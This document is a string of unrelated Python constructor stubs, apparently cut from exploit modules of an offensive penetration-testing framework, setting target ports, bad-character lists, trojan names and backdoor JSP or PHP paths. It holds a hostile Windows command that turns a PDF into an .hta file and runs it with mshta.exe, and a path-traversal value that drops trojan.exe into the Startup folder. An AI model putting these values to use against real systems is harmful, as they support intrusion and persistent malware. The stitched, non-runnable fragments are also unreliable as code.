def __init__(self):
tcpexploit.__init__(self)
self.name = NAME
self.version = 0
self.host = ''
self.port = 445
self.timeout = 2
self.threshold = 0.2
self.debug = False
self.privacy = False
self.frag_level = None
def __init__(self):
tcpexploit.__init__(self)
self.host = ""
self.filename = os.getcwd(
) + "/3rdparty/D2SEC/exploits/d2sec_tmeac/d2.jsp"
self.protocol = "https"
self.port = 4343
self.username = ""
self.password = ""
self.name = NAME
return
def __init__(self):
tcpexploit.__init__(self)
self.TROJANMODE = 0
self.setInfo(DESCRIPTION)
self.name = NAME
self.port = 5555
self.version = 0
self.cmd = ""
self.trojanname = "index.hta"
return
def __init__(self): tcpexploit.__init__(self) self.host = "" self.cmd = "id" self.basepath = "/" self.protocol = "http" self.port = 80 self.sslport = 443 self.https = 1 self.name = NAME return
def __init__(self):
tcpexploit.__init__(self)
self.name = NAME
self.setPort(0)
self.setHost("")
self.setVersion(1)
self.badstring = ""
self.args = ""
self.source = ""
self.dest = "out.exe"
return
def __init__(self): tcpexploit.__init__(self) self.host = "" self.filename = "backdoors/php_callback.php" self.basepath = "/" self.protocol = "http" self.port = 80 self.sslport = 443 self.https = 1 self.name = NAME return
def __init__(self):
tcpexploit.__init__(self)
self.setInfo(DESCRIPTION)
self.name = NAME
self.port = 80
self.searchbadstring = "\x00"
self.badstring = self.searchbadstring
self.version = 0
self.ssl = 0
return
def __init__(self):
tcpexploit.__init__(self)
self.result = ""
self.name = NAME
self.user = u""
self.password = u""
self.domain = u""
self.root_key = 'HKEY_CLASSES_ROOT'
self.sub_key = '\\'
self.port = 445
self.version = 0
def __init__(self):
tcpexploit.__init__(self)
self.host = ""
self.filename = os.getcwd(
) + "/3rdparty/D2SEC/exploits/d2sec_desktopcentral3/d2.jsp"
self.protocol = "http"
self.port = 8020
self.sslport = 8383
self.https = 0
self.name = NAME
return
def __init__(self):
tcpexploit.__init__(self)
self.setInfo(DESCRIPTION)
self.name = NAME
self.port = 80
self.version = 0
self.protocol = "http"
self.cmd = ""
self.login = "******"
self.password = "******"
return
def __init__(self):
tcpexploit.__init__(self)
self.covertness = 0
self.port = 25
self.host = "10.10.10.7"
self.localhost = "192.168.0.2"
self.localport = 5555
self.badstring = "\x00\r\n:<>@.\x20" #"\x00\r\n\\/.:$<>"
self.name = NAME
self.listenerArgsDict["fromcreatethread"] = 1
return
def __init__(self, localhost, port=0, timeout=20):
threading.Thread.__init__(self)
tcpexploit.__init__(self)
self.localhost = localhost
self.port = port
self.timeout = timeout
self.error = 0
self.lock = 1
self.accepted = 0
self.name = "UPNP_HTTPServer on port %d" % self.port
return
def __init__(self):
tcpexploit.__init__(self)
self.setInfo(DESCRIPTION)
self.name = NAME
self.TROJANMODE = 0
self.host = ""
self.port = 8080
self.cmd = ""
self.trojanname = "mosdef"
self.path = os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_zopeplone/"
return
def __init__(self):
tcpexploit.__init__(self)
self.name = NAME
self.port = 2103
self.version = 0
self.badstring = '\0\xff'
self.myDCE = None
self.connectionList = []
self.subesp = 0
self.covertness = 0
self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self):
tcpexploit.__init__(self)
self.host = ""
self.filename = os.getcwd(
) + "/3rdparty/D2SEC/exploits/d2sec_hpimc/d2.jsp"
self.protocol = "http"
self.port = 8080
self.sslport = 8443
self.https = 1
self.name = NAME
return
def __init__(self):
tcpexploit.__init__(self)
CommandExploit.__init__(self)
self.port = 80
self.ssl = 0
self.done = 0
self.version = 0
self.name = NAME
self.vhost = ''
self.basepath = "/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2"
def __init__(self):
tcpexploit.__init__(self)
self.name = NAME
self.srcpdf = os.getcwd(
) + "/3rdparty/D2SEC/exploits/d2sec_pdfbin/source.pdf"
self.dstpdf = "res.pdf"
self.binname = "app.exe"
self.command = "@CD .. & @FOR /F \"usebackq delims=>\" %i IN (`dir /B /S res*.pdf`) do @copy /Y \"%~si\" \"%CD%/test.hta\" >NUL & @mshta.exe \"%CD%/test.hta\""
return
def __init__(self):
tcpexploit.__init__(self)
self.name = NAME
self.debug = False
self.ssl = None
self.url = None
self.username = None # This is Post-Auth
self.password = None
self.hostname = None
self.cmd = None # Allow for user specified commands
self.shellChunks = [] # We split our b64'd shell into 50 byte chunks to write out to the file system
def __init__(self):
tcpexploit.__init__(self)
self.name = NAME
self.host = ''
self.port = 5000
self.dict = ''
self.website = self.host
self.mylock = threading.RLock()
self.threadcount = 5
self.authtrue = False
self.passadmin = ''
def __init__(self):
tcpexploit.__init__(self)
self.covertness = 0
self.port = 25
self.host = "10.10.10.7"
self.localhost = "192.168.0.2"
self.localport = 5555
self.badstring = "\x00\r\n\\/.:$"
self.name = NAME
return
def __init__(self):
tcpexploit.__init__(self)
self.setInfo(DESCRIPTION)
self.name = NAME
self.host = ''
self.port = 445
self.needsNoShellcode = 1
self.version = 0
self.ring0Shellcode = ''
self.listenerArgsDict["fromcreatethread"] = 1
return
def __init__(self):
tcpexploit.__init__(self)
self.lenchunk = 0
self.setPort(5900)
self.setHost("")
self.setVersion(1)
self.badstring = ""
self.istest = 0
self.netmask = "32"
self.name = NAME
return
def __init__(self):
tcpexploit.__init__(self)
self.port = 9535
self.host = ""
self.name = NAME
self.badstring = "\x00"
self.trojanname = "trojan.exe"
self.dstfile = "\..\..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\LsmSnmpSrv.exe"
return
def __init__(self):
tcpexploit.__init__(self)
self.covertness = 0
self.port = 8000
self.host = "10.10.10.7"
self.localhost = "192.168.0.2"
self.localport = 5555
self.badstring = "\0/\r\n"
self.myDCE = None
self.name = NAME
return
def __init__(self):
tcpexploit.__init__(self)
self.TROJANMODE = 0
self.setInfo(DESCRIPTION)
self.name = NAME
self.port = 8080
self.version = 0
self.protocol = "http"
self.cmd = ""
self.trojanname = "d2"
return
def __init__(self):
tcpexploit.__init__(self)
self.port = 6080
self.host = ""
self.shellcode = "\xcc" * 298
self.badstring = "\x00\x0a\x0d\x5c\x02\x2e\x5f\x2f\x20\x25"
self.setVersions()
self.version = 1
self.name = NAME
self.result = 1
def __init__(self):
tcpexploit.__init__(self)
#CLASS ATTRIBUTES
self.name = NAME
self.debug = False
self.ssl = True
self.username = None
self.password = None
self.hostname = None
self.url = "https://%s"
self.UA = None
def __init__(self):
tcpexploit.__init__(self)
self.mysmbclient=SAMBAClient()
self.setPort(139)
self.setHost("")
self.setVersion(1)
self.badstring="\x00\\/.:?\r\n%?"
self.user=None
self.password=None
self.name=NAME
return
def __init__(self):
tcpexploit.__init__(self)
self.covertness = 0
self.port = 443
self.host = "10.10.10.3"
self.localhost = "192.168.0.2"
self.localport = 5555
self.setVersion(0)
self.badstring = ""
self.myDCE = None
self.name = NAME
return
def __init__(self):
tcpexploit.__init__(self)
self.port = 2947
self.host = ""
self.shellcode = ''
self.stage2 = ''
self.badstring = ''
self.setVersions()
self.version = 0
self.name = NAME
return
